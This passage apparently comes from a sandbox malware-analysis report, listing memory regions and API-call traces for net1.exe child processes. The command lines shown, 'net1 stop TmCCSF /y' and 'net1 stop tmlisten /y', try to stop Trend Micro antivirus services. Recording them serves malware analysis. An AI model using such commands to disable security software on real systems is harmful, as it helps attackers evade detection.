"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11557 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11558 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11559 start_va = 0xffdf0000 end_va = 0xffe22fff entry_point = 0xffdf0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11560 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11561 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11562 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 11563 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11611 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11612 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11613 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11614 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 11615 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 11616 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 11617 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11618 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11619 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11620 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11621 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11622 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11623 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11624 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11625 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11626 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11627 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11628 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11629 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11630 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11631 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11632 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11633 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11634 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11635 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11636 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11657 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 847 os_tid = 0xc54 [0116.627] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f8b0 | out: lpSystemTimeAsFileTime=0x14f8b0*(dwLowDateTime=0xfaa6a5f0, dwHighDateTime=0x1d48689)) [0116.627] GetCurrentProcessId () returned 0x5e0 [0116.627] GetCurrentThreadId () returned 0xc54 [0116.627] GetTickCount () returned 0x26d43 [0116.627] QueryPerformanceCounter (in: lpPerformanceCount=0x14f8b8 | out: lpPerformanceCount=0x14f8b8*=1816354500000) returned 1 [0116.628] GetModuleHandleW (lpModuleName=0x0) returned 0xffdf0000 [0116.628] __set_app_type (_Type=0x1) [0116.628] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe09c9c) returned 0x0 [0116.628] __getmainargs (in: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788, _DoWildCard=0, _StartInfo=0xffe1479c | out: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788) returned 0 [0116.628] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.629] GetConsoleOutputCP () returned 0x1b5 [0116.646] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe1cec0 | out: lpCPInfo=0xffe1cec0) returned 1 [0116.647] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0116.649] sprintf_s (in: _DstBuf=0x14f858, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0116.649] setlocale (category=0, locale=".437") returned="English_United States.437" [0116.651] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.651] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0116.651] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TmCCSF /y" [0116.651] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f5f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0116.652] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0116.652] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14f848 | out: Buffer=0x14f848*=0x244d40) returned 0x0 [0116.652] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14f848 | out: Buffer=0x14f848*=0x24c0e0) returned 0x0 [0116.652] _fileno (_File=0x7fefdba2a80) returned 0 [0116.652] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0116.652] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0116.652] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0116.652] _wcsicmp (_String1="config", _String2="stop") returned -16 [0116.653] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0116.653] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0116.653] _wcsicmp (_String1="file", _String2="stop") returned -13 [0116.653] _wcsicmp (_String1="files", _String2="stop") returned -13 [0116.653] _wcsicmp (_String1="group", _String2="stop") returned -12 [0116.653] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0116.653] _wcsicmp (_String1="help", _String2="stop") returned -11 [0116.653] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0116.653] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0116.653] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0116.653] _wcsicmp (_String1="session", _String2="stop") returned -15 [0116.653] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0116.653] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0116.653] _wcsicmp (_String1="share", _String2="stop") returned -12 [0116.653] _wcsicmp (_String1="start", _String2="stop") returned -14 [0116.653] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0116.653] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0116.653] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0116.654] _wcsicmp (_String1="accounts", _String2="TmCCSF") returned -19 [0116.654] _wcsicmp (_String1="computer", _String2="TmCCSF") returned -17 [0116.654] _wcsicmp (_String1="config", _String2="TmCCSF") returned -17 [0116.654] _wcsicmp (_String1="continue", _String2="TmCCSF") returned -17 [0116.654] _wcsicmp (_String1="cont", _String2="TmCCSF") returned -17 [0116.654] _wcsicmp (_String1="file", _String2="TmCCSF") returned -14 [0116.655] _wcsicmp (_String1="files", _String2="TmCCSF") returned -14 [0116.655] _wcsicmp (_String1="group", _String2="TmCCSF") returned -13 [0116.655] _wcsicmp (_String1="groups", _String2="TmCCSF") returned -13 [0116.655] _wcsicmp (_String1="help", _String2="TmCCSF") returned -12 [0116.655] _wcsicmp (_String1="helpmsg", _String2="TmCCSF") returned -12 [0116.655] _wcsicmp (_String1="localgroup", _String2="TmCCSF") returned -8 [0116.655] _wcsicmp (_String1="pause", _String2="TmCCSF") returned -4 [0116.655] _wcsicmp (_String1="session", _String2="TmCCSF") returned -1 [0116.655] _wcsicmp (_String1="sessions", _String2="TmCCSF") returned -1 [0116.655] _wcsicmp (_String1="sess", _String2="TmCCSF") returned -1 [0116.655] _wcsicmp (_String1="share", _String2="TmCCSF") returned -1 [0116.655] _wcsicmp (_String1="start", _String2="TmCCSF") returned -1 [0116.655] _wcsicmp (_String1="stats", _String2="TmCCSF") returned -1 [0116.655] _wcsicmp (_String1="statistics", _String2="TmCCSF") returned -1 [0116.655] _wcsicmp (_String1="stop", _String2="TmCCSF") returned -1 [0116.655] _wcsicmp (_String1="time", _String2="TmCCSF") returned -4 [0116.656] _wcsicmp (_String1="user", _String2="TmCCSF") returned 1 [0116.656] _wcsicmp (_String1="users", _String2="TmCCSF") returned 1 [0116.656] _wcsicmp (_String1="msg", _String2="TmCCSF") returned -7 [0116.656] _wcsicmp (_String1="messenger", _String2="TmCCSF") returned -7 [0116.656] _wcsicmp (_String1="receiver", _String2="TmCCSF") returned -2 [0116.656] _wcsicmp (_String1="rcv", _String2="TmCCSF") returned -2 [0116.656] _wcsicmp (_String1="netpopup", _String2="TmCCSF") returned -6 [0116.656] _wcsicmp (_String1="redirector", _String2="TmCCSF") returned -2 [0116.656] _wcsicmp (_String1="redir", _String2="TmCCSF") returned -2 [0116.656] _wcsicmp (_String1="rdr", _String2="TmCCSF") returned -2 [0116.656] _wcsicmp (_String1="workstation", _String2="TmCCSF") returned 3 [0116.656] _wcsicmp (_String1="work", _String2="TmCCSF") returned 3 [0116.656] _wcsicmp (_String1="wksta", _String2="TmCCSF") returned 3 [0116.656] _wcsicmp (_String1="prdr", _String2="TmCCSF") returned -4 [0116.656] _wcsicmp (_String1="devrdr", _String2="TmCCSF") returned -16 [0116.656] _wcsicmp (_String1="lanmanworkstation", _String2="TmCCSF") returned -8 [0116.656] _wcsicmp (_String1="server", _String2="TmCCSF") returned -1 [0116.656] _wcsicmp (_String1="svr", _String2="TmCCSF") returned -1 [0116.656] _wcsicmp (_String1="srv", _String2="TmCCSF") returned -1 [0116.656] _wcsicmp (_String1="lanmanserver", _String2="TmCCSF") returned -8 [0116.657] _wcsicmp (_String1="alerter", _String2="TmCCSF") returned -19 [0116.657] _wcsicmp (_String1="netlogon", _String2="TmCCSF") returned -6 [0116.657] _wcsupr (in: _String="TmCCSF" | out: _String="TMCCSF") returned="TMCCSF" [0116.657] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x24c900 [0116.727] GetServiceKeyNameW (in: hSCManager=0x24c900, lpDisplayName="TMCCSF", lpServiceName=0xffe15750, lpcchBuffer=0x14f768 | out: lpServiceName="", lpcchBuffer=0x14f768) returned 0 [0116.728] _wcsicmp (_String1="msg", _String2="TMCCSF") returned -7 [0116.728] _wcsicmp (_String1="messenger", _String2="TMCCSF") returned -7 [0116.728] _wcsicmp (_String1="receiver", _String2="TMCCSF") returned -2 [0116.728] _wcsicmp (_String1="rcv", _String2="TMCCSF") returned -2 [0116.729] _wcsicmp (_String1="redirector", _String2="TMCCSF") returned -2 [0116.729] _wcsicmp (_String1="redir", _String2="TMCCSF") returned -2 [0116.729] _wcsicmp (_String1="rdr", _String2="TMCCSF") returned -2 [0116.729] _wcsicmp (_String1="workstation", _String2="TMCCSF") returned 3 [0116.729] _wcsicmp (_String1="work", _String2="TMCCSF") returned 3 [0116.729] _wcsicmp (_String1="wksta", _String2="TMCCSF") returned 3 [0116.729] _wcsicmp (_String1="prdr", _String2="TMCCSF") returned -4 [0116.729] _wcsicmp (_String1="devrdr", _String2="TMCCSF") returned -16 [0116.729] _wcsicmp (_String1="lanmanworkstation", _String2="TMCCSF") returned -8 [0116.729] _wcsicmp (_String1="server", _String2="TMCCSF") returned -1 [0116.729] _wcsicmp (_String1="svr", _String2="TMCCSF") returned -1 [0116.729] _wcsicmp (_String1="srv", _String2="TMCCSF") returned -1 [0116.729] _wcsicmp (_String1="lanmanserver", _String2="TMCCSF") returned -8 [0116.729] _wcsicmp (_String1="alerter", _String2="TMCCSF") returned -19 [0116.729] _wcsicmp (_String1="netlogon", _String2="TMCCSF") returned -6 [0116.730] NetServiceControl (in: servername=0x0, service="TMCCSF", opcode=0x0, arg=0x0, bufptr=0x14f770 | out: bufptr=0x14f770) returned 0x889 [0116.731] wcscpy_s (in: _Destination=0xffe180d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0116.731] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0116.732] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0116.734] GetFileType (hFile=0xb) returned 0x2 [0116.734] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f638 | out: lpMode=0x14f638) returned 1 [0116.734] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x14f630, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0x14f630*=0x1e) returned 1 [0116.735] GetFileType (hFile=0xb) returned 0x2 [0116.735] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f638 | out: lpMode=0x14f638) returned 1 [0116.735] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f630, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0x14f630*=0x2) returned 1 [0116.736] _ultow (in: _Dest=0x889, _Radix=1373856 | out: _Dest=0x889) returned="2185" [0116.736] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0116.736] GetFileType (hFile=0xb) returned 0x2 [0116.737] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f638 | out: lpMode=0x14f638) returned 1 [0116.737] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14f630, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0x14f630*=0x34) returned 1 [0116.737] GetFileType (hFile=0xb) returned 0x2 [0116.737] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f638 | out: lpMode=0x14f638) returned 1 [0116.738] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f630, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0x14f630*=0x2) returned 1 [0116.738] NetApiBufferFree (Buffer=0x244d40) returned 0x0 [0116.738] NetApiBufferFree (Buffer=0x24c0e0) returned 0x0 [0116.738] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TmCCSF /y" [0116.738] exit (_Code=2) Process: id = "328" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x505cb000" os_pid = "0x360" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "321" os_parent_pid = "0x1344" cmd_line = "C:\\Windows\\system32\\net1 stop tmlisten /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11564 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11565 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11566 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11567 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 11568 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11569 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11570 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11571 start_va = 0xffdf0000 end_va = 0xffe22fff entry_point = 0xffdf0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11572 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11573 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11574 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 11575 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11576 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11577 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 11578 start_va = 0x270000 end_va = 0x2d6fff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11579 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11580 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11581 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11582 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11637 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11638 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 11639 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 11640 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11641 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11642 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11643 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11644 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11645 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11646 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11647 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11648 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11649 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11650 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11651 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11652 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11653 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11654 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11655 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11656 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 848 os_tid = 0xa58 [0116.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10f950 | out: lpSystemTimeAsFileTime=0x10f950*(dwLowDateTime=0xfaab68b0, dwHighDateTime=0x1d48689)) [0116.644] GetCurrentProcessId () returned 0x360 [0116.644] GetCurrentThreadId () returned 0xa58 [0116.644] GetTickCount () returned 0x26d62 [0116.644] QueryPerformanceCounter (in: lpPerformanceCount=0x10f958 | out: lpPerformanceCount=0x10f958*=1816356200000) returned 1 [0116.645] GetModuleHandleW (lpModuleName=0x0) returned 0xffdf0000 [0116.646] __set_app_type (_Type=0x1) [0116.646] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe09c9c) returned 0x0 [0116.646] __getmainargs (in: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788, _DoWildCard=0, _StartInfo=0xffe1479c | out: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788) returned 0 [0116.646] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.646] GetConsoleOutputCP () returned 0x1b5 [0116.694] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe1cec0 | out: lpCPInfo=0xffe1cec0) returned 1 [0116.695] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0116.697] sprintf_s (in: _DstBuf=0x10f8f8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0116.697] setlocale (category=0, locale=".437") returned="English_United States.437" [0116.699] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.699] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0116.699] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop tmlisten /y" [0116.699] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10f690, nSize=0x104 